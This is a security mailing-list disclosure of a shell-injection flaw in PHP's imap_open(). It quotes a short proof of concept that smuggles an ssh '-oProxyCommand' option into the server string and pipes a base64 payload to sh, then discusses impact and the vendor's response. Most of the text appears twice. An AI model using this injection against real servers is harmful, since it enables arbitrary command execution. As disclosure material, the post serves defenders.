Hanno Böck
2018-11-22 20:02:14 UTC
Hi,
This was apparently posted on some russian forum recently and then
re-posted to github:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
PoC code:
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
It's pretty self explaining, it seems imap_open() will pass things to
ssh and this is vulnerable to a shell injection.
Impact would be mostly relevant if someone has some imap functionality
where a user can define a custom imap server. (Though it might also be
used as a bypass for environments where exec() and similar functions
are restricted.)
I reported it to upstream PHP a few days ago, it was closed as a
duplicate, so it seems they already knew about it. It's unfixed in
current versions.
There seems to be some speculation that this might've been involved in a
hack of a .onion hoster:
https://danwin1210.me/
This was apparently posted on some russian forum recently and then
re-posted to github:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
PoC code:
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
It's pretty self explaining, it seems imap_open() will pass things to
ssh and this is vulnerable to a shell injection.
Impact would be mostly relevant if someone has some imap functionality
where a user can define a custom imap server. (Though it might also be
used as a bypass for environments where exec() and similar functions
are restricted.)
I reported it to upstream PHP a few days ago, it was closed as a
duplicate, so it seems they already knew about it. It's unfixed in
current versions.
There seems to be some speculation that this might've been involved in a
hack of a .onion hoster:
https://danwin1210.me/
--
Hanno Böck
https://hboeck.de/
mail/jabber: ***@hboeck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42
Hanno Böck
https://hboeck.de/
mail/jabber: ***@hboeck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42